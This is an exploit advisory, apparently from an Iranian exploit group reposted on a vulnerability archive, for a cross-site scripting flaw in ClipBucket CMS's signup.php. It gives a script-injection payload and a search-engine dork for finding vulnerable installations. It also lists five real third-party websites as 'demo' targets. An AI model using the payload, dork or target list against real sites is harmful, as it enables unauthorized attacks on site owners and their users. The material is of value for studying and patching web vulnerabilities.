ClipBucket CMS Cross Site Scripting

2014.06.17
Credit: IeDb
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

***************************** ***************************** # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ***************************** ***************************** # Iranian Exploit DataBase # ClipBucket CMS Xss Vulnerability # Vendor site : http://clip-bucket.com/ # Dork : intext:"Forged by ClipBucket" # Author : IeDb # Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - Www.IrIsT.Ir # Fb Page : https://www.facebook.com/iedb.ir ***************************** ***************************** --- Bug : POST parameter In signup.php Page Parameter : "><script>alert('IeDb.Ir')</script> http://site.com/signup.php --- Image : 1 - http://iedb.ir/up/imagef-140270233266551-jpg.html 2 - http://iedb.ir/up/imagef-140270235241331-jpg.html --- Dem0 : http://tvpXarsj.ir/signup.php http://videXoland.ir/signup.php http://muqXtube.ir/signup.php http://dengeXrinlagu.com/signup.php http://videXos.agro.uba.ar/signup.php ***************************** ***************************** # Greats : Bl4ck M4n - ErfanMs - TaK.FaNaR - N20 - Bl4ck N3T - dr.koderz - Enddo - E1.Coders - Behnam Vanda # E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - 0x0ptim0us - 0Day # Security - ARTA - ARYABOD - Mr.Time - C0dex - Dj.TiniVini - Det3cT0r - yashar shahinzadeh # Khashayar - tootro20 - AmirMasoud And All Members In IeDb.Ir/acc ***************************** ***************************** # Archive Exploit = http://www.iedb.ir/exploits-1830.html ***************************** *****************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top